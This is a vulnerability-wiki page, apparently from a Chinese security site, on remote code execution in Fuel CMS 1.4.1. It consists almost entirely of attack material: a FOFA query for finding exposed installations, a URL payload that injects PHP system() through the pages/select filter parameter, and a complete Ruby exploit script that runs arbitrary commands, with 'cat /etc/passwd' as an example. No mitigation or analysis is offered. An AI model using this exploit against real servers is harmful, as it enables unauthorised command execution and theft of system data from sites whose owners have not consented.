menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right Fuel CMS 1.4.1 远程代码执行.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Fuel CMS 1.4.1 远程代码执行.md
    1.23 KB / 2021-05-21 09:14:38
        # Fuel CMS 1.4.1 远程代码执行
    
    FOFA:
    
    ```
    "Fuel CMS"
    ```
    
    PoC:
    
    ```bash
    /fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'
    ```
    
    ```ruby
    #!/usr/bin/env ruby
    
    require 'httpclient'
    require 'docopt'
    
    # dirty workaround to ignore Max-Age
    # https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
    $VERBOSE = nil
    
    doc = <<~DOCOPT
      Fuel CMS 1.4 - Remote Code Execution
    
      Usage:
        #{__FILE__} <url> <cmd>
        #{__FILE__} -h | --help
    
      Options:
        <url>         Root URL (base path) including HTTP scheme, port and root folder
        <cmd>         The system command to execute
        -h, --help    Show this screen
    
      Examples:
        #{__FILE__} http://example.org id
        #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
    DOCOPT
    
    def exploit(client, root_url, cmd)
      url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
    
      res = client.get(url)
    
      /system(.+?)<div/mx.match(res.body).captures[0].chomp
    end
    
    begin
      args = Docopt.docopt(doc)
      clnt = HTTPClient.new
      puts exploit(clnt, args['<url>'], args['<cmd>'])
    rescue Docopt::Exit => e
      puts e.message
    end
    
    ```
    
    ref:
    
    * https://github.com/nahi/httpclient/issues/242
    * https://www.exploit-db.com/exploits/49487
    
    links
    file_download